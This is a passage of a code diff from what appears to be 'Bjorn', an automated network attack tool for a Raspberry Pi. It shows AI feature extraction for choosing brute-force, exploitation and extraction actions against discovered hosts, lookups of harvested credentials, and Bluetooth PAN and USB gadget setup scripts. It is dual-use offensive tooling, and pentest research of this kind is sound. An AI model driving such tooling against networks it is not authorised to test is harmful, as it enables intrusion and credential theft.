return [r['service'] for r in results if r.get('service')]
except Exception:
return []
def _get_credentials_for_host(self, mac: str) -> List[Dict]:
"""Get credentials found for host"""
try:
return self.db.query("""
SELECT service, user, port
FROM creds
WHERE mac_address=?
""", (mac,))
except Exception:
return []
def _categorize_vendor(self, vendor: str) -> str:
"""Categorize vendor (same as feature_logger)"""
if not vendor:
return 'unknown'
vendor_lower = vendor.lower()
categories = {
'networking': ['cisco', 'juniper', 'ubiquiti', 'mikrotik', 'tp-link'],
'iot': ['hikvision', 'dahua', 'axis'],
'nas': ['synology', 'qnap'],
'compute': ['raspberry', 'intel', 'apple', 'dell', 'hp'],
'virtualization': ['vmware', 'microsoft'],
'mobile': ['apple', 'samsung', 'huawei']
}
for category, vendors in categories.items():
if any(v in vendor_lower for v in vendors):
return category
return 'other'
def _detect_port_profile(self, ports) -> str:
"""Detect device profile from ports (same as feature_logger)"""
port_set = set(ports)
profiles = {
'camera': {554, 80, 8000},
'web_server': {80, 443, 8080},
'nas': {5000, 5001, 548, 139, 445},
'database': {3306, 5432, 1433, 27017},
'linux_server': {22, 80, 443},
'windows_server': {135, 139, 445, 3389},
'printer': {9100, 515, 631},
'router': {22, 23, 80, 443, 161}
}
max_overlap = 0
best_profile = 'generic'
for profile_name, profile_ports in profiles.items():
overlap = len(port_set & profile_ports)
if overlap > max_overlap:
max_overlap = overlap
best_profile = profile_name
return best_profile if max_overlap >= 2 else 'generic'
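The profile matcher above is a max-overlap vote with a minimum-evidence threshold. A self-contained sketch of the same rule (the `detect_profile` name and the two-profile table are illustrative):

```python
def detect_profile(ports: set, profiles: dict) -> str:
    # Pick the profile sharing the most ports with the host; require at
    # least 2 overlapping ports, otherwise fall back to 'generic' --
    # the same rule as _detect_port_profile.
    best, best_overlap = 'generic', 0
    for name, profile_ports in profiles.items():
        overlap = len(ports & profile_ports)
        if overlap > best_overlap:
            best, best_overlap = name, overlap
    return best if best_overlap >= 2 else 'generic'
```

The threshold matters: a single shared port (e.g. 80, which appears in several profiles) is not enough evidence to classify a device.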
# ═══════════════════════════════════════════════════════════════════════
# STATISTICS
# ═══════════════════════════════════════════════════════════════════════
def get_stats(self) -> Dict[str, Any]:
"""Get AI engine statistics"""
stats = {
'model_loaded': self.model_loaded,
'heuristics_available': True,
'decision_mode': 'neural_network' if self.model_loaded else 'heuristics'
}
if self.model_loaded and self.model_config:
stats.update({
'model_version': self.model_config.get('version'),
'model_trained_at': self.model_config.get('trained_at'),
'model_accuracy': self.model_config.get('accuracy'),
'training_samples': self.model_config.get('training_samples')
})
return stats
# ═══════════════════════════════════════════════════════════════════════════
# SINGLETON FACTORY
# ═══════════════════════════════════════════════════════════════════════════
def get_or_create_ai_engine(shared_data) -> Optional['BjornAIEngine']:
"""
Return the single BjornAIEngine instance attached to shared_data.
Creates it on first call; subsequent calls return the cached instance.
Use this instead of BjornAIEngine(shared_data) to avoid loading model
weights multiple times (orchestrator + scheduler + web each need AI).
"""
if getattr(shared_data, '_ai_engine_singleton', None) is None:
try:
shared_data._ai_engine_singleton = BjornAIEngine(shared_data)
except Exception as e:
logger.error(f"Failed to create BjornAIEngine singleton: {e}")
shared_data._ai_engine_singleton = None
return shared_data._ai_engine_singleton
def invalidate_ai_engine(shared_data) -> None:
"""Drop the cached singleton (e.g. after a mode reset or model update)."""
shared_data._ai_engine_singleton = None
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════
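The factory above caches the engine on `shared_data` itself so the orchestrator, scheduler, and web server share one instance. A standalone sketch of that caching pattern with stand-in classes (`StubEngine`/`SharedData` are illustrative, not the real Bjorn types):

```python
class StubEngine:
    """Stands in for an expensive-to-build AI engine."""
    instances_created = 0

    def __init__(self, shared_data):
        StubEngine.instances_created += 1
        self.shared_data = shared_data


class SharedData:
    """Bare container, like Bjorn's shared_data object."""
    pass


def get_or_create_engine(shared_data):
    # Cache the engine on shared_data so every caller reuses one instance.
    if getattr(shared_data, '_ai_engine_singleton', None) is None:
        shared_data._ai_engine_singleton = StubEngine(shared_data)
    return shared_data._ai_engine_singleton


def invalidate_engine(shared_data):
    # Drop the cache; the next get_or_create_engine call rebuilds it.
    shared_data._ai_engine_singleton = None
```

Because the cache lives on `shared_data` rather than in a module global, two independent `SharedData` objects would each get their own engine, which matches the factory's contract.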

ai_utils.py Normal file

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except Exception:
return "00:00:00:00:00:00"
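The MAC-formatting one-liner and the one-hot encodings in this module can be exercised in isolation. A sketch reusing the same expressions on fixed inputs (the helper names and sample values are illustrative):

```python
def format_mac(node: int) -> str:
    # Same expression as get_system_mac: render 12 uppercase hex digits,
    # then join colon-separated pairs.
    return ':'.join(('%012X' % node)[i:i + 2] for i in range(0, 12, 2))


def one_hot(value: str, categories: list) -> dict:
    # Same pattern as the vendor/profile/action encodings above:
    # exactly one key is 1.0, the rest are 0.0.
    return {f'is_{c}': 1.0 if c == value else 0.0 for c in categories}
```

Note that an unknown `value` produces an all-zero vector, which is why the feature extractor defaults missing categories to `'unknown'` and includes `'unknown'` in each category list.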

bjorn_bluetooth.sh Normal file

@@ -0,0 +1,517 @@
#!/bin/bash
# bjorn_bluetooth_manager.sh
# Script to configure Bluetooth PAN for BJORN
# Usage: ./bjorn_bluetooth_manager.sh -f
# ./bjorn_bluetooth_manager.sh -u
# ./bjorn_bluetooth_manager.sh -l
# ./bjorn_bluetooth_manager.sh -h
# Author: Infinition
# Version: 1.1
# Description: This script configures and manages Bluetooth PAN for BJORN
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_bluetooth_manager_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
"CYAN") echo -e "${CYAN}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "Failed: $1"
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install Bluetooth PAN"
echo -e " ${BLUE}-u${NC} Uninstall Bluetooth PAN"
echo -e " ${BLUE}-l${NC} List Bluetooth PAN Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install Bluetooth PAN"
echo -e " $0 -u Uninstall Bluetooth PAN"
echo -e " $0 -l List Bluetooth PAN Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== Bluetooth PAN Configuration Procedure =====${NC}"
echo -e "To configure the Bluetooth PAN driver and set the IP address, subnet mask, and gateway for the PAN network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e " - DNS Servers: 8.8.8.8, 8.8.4.4"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the Bluetooth PAN, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart auto_bt_connect.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the PAN network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install Bluetooth PAN
# ============================================================
install_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Create settings directory
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
if [ ! -d "$SETTINGS_DIR" ]; then
mkdir -p "$SETTINGS_DIR"
check_success "Created settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR already exists. Skipping creation."
fi
# Create bt.json if it doesn't exist
BT_CONFIG="$SETTINGS_DIR/bt.json"
if [ ! -f "$BT_CONFIG" ]; then
log "INFO" "Creating Bluetooth configuration file at $BT_CONFIG"
cat << 'EOF' > "$BT_CONFIG"
{
"device_mac": "AA:BB:CC:DD:EE:FF"
}
EOF
check_success "Created Bluetooth configuration file at $BT_CONFIG"
log "WARNING" "Please edit $BT_CONFIG to include your Bluetooth device's MAC address."
else
log "INFO" "Bluetooth configuration file $BT_CONFIG already exists. Skipping creation."
fi
# Create auto_bt_connect.py
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
if [ ! -f "$BT_PY_SCRIPT" ]; then
log "INFO" "Creating Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
cat << 'EOF' > "$BT_PY_SCRIPT"
#!/usr/bin/env python3
import json
import subprocess
import time
import logging
import os
LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
logging.basicConfig(filename="/var/log/auto_bt_connect.log", level=logging.INFO, format=LOG_FORMAT)
logger = logging.getLogger("auto_bt_connect")
CONFIG_PATH = "/home/bjorn/.settings_bjorn/bt.json"
CHECK_INTERVAL = 30 # Interval in seconds between each check
def ensure_bluetooth_service():
try:
res = subprocess.run(["systemctl", "is-active", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if res.stdout.strip() != "active":  # exact match: "inactive" contains "active"
logger.info("Bluetooth service not active. Starting and enabling it...")
start_res = subprocess.run(["systemctl", "start", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if start_res.returncode != 0:
logger.error(f"Failed to start bluetooth service: {start_res.stderr}")
return False
enable_res = subprocess.run(["systemctl", "enable", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if enable_res.returncode != 0:
logger.error(f"Failed to enable bluetooth service: {enable_res.stderr}")
# Not fatal, but log it.
else:
logger.info("Bluetooth service enabled successfully.")
else:
logger.info("Bluetooth service is already active.")
return True
except Exception as e:
logger.error(f"Error ensuring bluetooth service: {e}")
return False
def is_already_connected():
# Check if bnep0 interface is up with an IP
ip_res = subprocess.run(["ip", "addr", "show", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if ip_res.returncode == 0 and "inet " in ip_res.stdout:
# bnep0 interface exists and has an IPv4 address
logger.info("bnep0 is already up and has an IP. No action needed.")
return True
return False
def run_in_background(cmd):
# Run a command in background, return the process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
return process
def establish_connection(device_mac):
# Attempt to run bt-network
logger.info(f"Attempting to connect PAN with device {device_mac}...")
bt_process = run_in_background(["bt-network", "-c", device_mac, "nap"])
# Wait a bit for PAN to set up
time.sleep(3)
# Check if bt-network exited prematurely
if bt_process.poll() is not None:
# Process ended
if bt_process.returncode != 0:
stderr_output = bt_process.stderr.read() if bt_process.stderr else ""
logger.error(f"bt-network failed: {stderr_output}")
return False
else:
logger.warning("bt-network ended immediately. PAN may not be established.")
return False
else:
logger.info("bt-network running in background...")
# Now run dhclient for IPv4
dh_res = subprocess.run(["dhclient", "-4", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if dh_res.returncode != 0:
logger.error(f"dhclient failed: {dh_res.stderr}")
return False
logger.info("Successfully obtained IP on bnep0. PAN connection established.")
return True
def load_config():
if not os.path.exists(CONFIG_PATH):
logger.error(f"Config file {CONFIG_PATH} not found.")
return None
try:
with open(CONFIG_PATH, "r") as f:
config = json.load(f)
device_mac = config.get("device_mac")
if not device_mac:
logger.error("No device_mac found in config.")
return None
return device_mac
except Exception as e:
logger.error(f"Error loading config: {e}")
return None
def main():
device_mac = load_config()
if not device_mac:
return
while True:
try:
if not ensure_bluetooth_service():
logger.error("Bluetooth service setup failed.")
elif is_already_connected():
# Already connected and has IP, do nothing
pass
else:
# Attempt to establish connection
success = establish_connection(device_mac)
if not success:
logger.warning("Failed to establish PAN connection.")
except Exception as e:
logger.error(f"Unexpected error in main loop: {e}")
# Wait before the next check
time.sleep(CHECK_INTERVAL)
if __name__ == "__main__":
main()
EOF
check_success "Created Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
else
log "INFO" "Bluetooth auto-connect Python script $BT_PY_SCRIPT already exists. Skipping creation."
fi
# Make the Python script executable
chmod +x "$BT_PY_SCRIPT"
check_success "Made Python script executable at $BT_PY_SCRIPT"
# Create the systemd service
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
if [ ! -f "$BT_SERVICE" ]; then
log "INFO" "Creating systemd service at $BT_SERVICE"
cat << 'EOF' > "$BT_SERVICE"
[Unit]
Description=Auto Bluetooth PAN Connect
After=network.target bluetooth.service
Wants=bluetooth.service
[Service]
Type=simple
ExecStart=/usr/local/bin/auto_bt_connect.py
Restart=on-failure
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
check_success "Created systemd service at $BT_SERVICE"
else
log "INFO" "Systemd service $BT_SERVICE already exists. Skipping creation."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Enable and start the service
systemctl enable auto_bt_connect.service
check_success "Enabled auto_bt_connect.service"
systemctl start auto_bt_connect.service
check_success "Started auto_bt_connect.service"
echo -e "${GREEN}Bluetooth PAN installation completed successfully. A reboot is required for changes to take effect.${NC}"
}
# ============================================================
# Function to Uninstall Bluetooth PAN
# ============================================================
uninstall_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
BT_CONFIG="$SETTINGS_DIR/bt.json"
# Stop and disable the service
if systemctl is-active --quiet auto_bt_connect.service; then
systemctl stop auto_bt_connect.service
check_success "Stopped auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not running."
fi
if systemctl is-enabled --quiet auto_bt_connect.service; then
systemctl disable auto_bt_connect.service
check_success "Disabled auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not enabled."
fi
# Remove the systemd service file
if [ -f "$BT_SERVICE" ]; then
rm "$BT_SERVICE"
check_success "Removed $BT_SERVICE"
else
log "INFO" "$BT_SERVICE does not exist. Skipping removal."
fi
# Remove the Python script
if [ -f "$BT_PY_SCRIPT" ]; then
rm "$BT_PY_SCRIPT"
check_success "Removed $BT_PY_SCRIPT"
else
log "INFO" "$BT_PY_SCRIPT does not exist. Skipping removal."
fi
# Remove Bluetooth configuration directory and file
if [ -d "$SETTINGS_DIR" ]; then
rm -rf "$SETTINGS_DIR"
check_success "Removed settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR does not exist. Skipping removal."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "SUCCESS" "Bluetooth PAN uninstallation completed successfully."
}
# ============================================================
# Function to List Bluetooth PAN Information
# ============================================================
list_bluetooth_pan_info() {
echo -e "${CYAN}===== Bluetooth PAN Information =====${NC}"
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
BT_CONFIG="/home/bjorn/.settings_bjorn/bt.json"
# Check status of auto_bt_connect.service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q auto_bt_connect.service; then
systemctl status auto_bt_connect.service --no-pager
else
echo -e "${RED}auto_bt_connect.service is not installed.${NC}"
fi
# Check if Bluetooth auto-connect Python script exists
echo -e "\n${YELLOW}Bluetooth Auto-Connect Script:${NC}"
if [ -f "$BT_PY_SCRIPT" ]; then
echo -e "${GREEN}$BT_PY_SCRIPT exists.${NC}"
else
echo -e "${RED}$BT_PY_SCRIPT does not exist.${NC}"
fi
# Check Bluetooth configuration file
echo -e "\n${YELLOW}Bluetooth Configuration File:${NC}"
if [ -f "$BT_CONFIG" ]; then
echo -e "${GREEN}$BT_CONFIG exists.${NC}"
echo -e "${CYAN}Contents:${NC}"
cat "$BT_CONFIG"
else
echo -e "${RED}$BT_CONFIG does not exist.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Bluetooth PAN Manager Menu ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List Bluetooth PAN Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_bluetooth_pan_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting Bluetooth PAN Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_bluetooth_pan
exit 0
;;
u)
uninstall_bluetooth_pan
exit 0
;;
l)
list_bluetooth_pan_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi
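The embedded `auto_bt_connect.py` above checks `systemctl is-active` output. A substring test is a classic pitfall there, since `"inactive"` contains `"active"`; a minimal sketch of the safe comparison (the `service_is_active` helper is illustrative):

```python
def service_is_active(status_output: str) -> bool:
    # systemctl is-active prints a single word: "active", "inactive",
    # "failed", ... Exact comparison after stripping whitespace avoids
    # misreading "inactive" as active.
    return status_output.strip() == "active"
```

The same applies to any `systemctl` state probe: compare the whole token, never test for a substring.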

bjorn_usb_gadget.sh Normal file

@@ -0,0 +1,567 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Script to configure USB Gadget for BJORN
# Usage: ./bjorn_usb_gadget.sh -f
# ./bjorn_usb_gadget.sh -u
# ./bjorn_usb_gadget.sh -l
# ./bjorn_usb_gadget.sh -h
# Author: Infinition
# Version: 1.4
# Description: This script configures and manages USB Gadget for BJORN with duplicate prevention
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "Failed: $1"
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install USB Gadget"
echo -e " ${BLUE}-u${NC} Uninstall USB Gadget"
echo -e " ${BLUE}-l${NC} List USB Gadget Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install USB Gadget"
echo -e " $0 -u Uninstall USB Gadget"
echo -e " $0 -l List USB Gadget Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== RNDIS Configuration Procedure =====${NC}"
echo -e "To configure the RNDIS driver and set the IP address, subnet mask, and gateway for the RNDIS network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the USB gadget, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart usb-gadget.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the RNDIS network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install USB Gadget with RNDIS
# ============================================================
install_usb_gadget() {
log "INFO" "Starting USB Gadget installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Backup cmdline.txt and config.txt if not already backed up
if [ ! -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt /boot/firmware/cmdline.txt.bak
check_success "Backed up /boot/firmware/cmdline.txt to /boot/firmware/cmdline.txt.bak"
else
log "INFO" "/boot/firmware/cmdline.txt.bak already exists. Skipping backup."
fi
if [ ! -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt /boot/firmware/config.txt.bak
check_success "Backed up /boot/firmware/config.txt to /boot/firmware/config.txt.bak"
else
log "INFO" "/boot/firmware/config.txt.bak already exists. Skipping backup."
fi
# Modify cmdline.txt: Remove existing modules-load entries related to dwc2
log "INFO" "Cleaning up existing modules-load entries in /boot/firmware/cmdline.txt"
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
check_success "Removed duplicate modules-load entries from /boot/firmware/cmdline.txt"
# Add a single modules-load=dwc2,g_rndis if not present
if ! grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_rndis/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_rndis to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_rndis already present in /boot/firmware/cmdline.txt"
fi
# Add a single modules-load=dwc2,g_ether if not present
if ! grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_ether to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_ether already present in /boot/firmware/cmdline.txt"
fi
# Modify config.txt: Remove duplicate dtoverlay=dwc2 entries
log "INFO" "Cleaning up existing dtoverlay=dwc2 entries in /boot/firmware/config.txt"
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
check_success "Removed duplicate dtoverlay=dwc2 entries from /boot/firmware/config.txt"
# Append a single dtoverlay=dwc2 if not present
if ! grep -q "^dtoverlay=dwc2$" /boot/firmware/config.txt; then
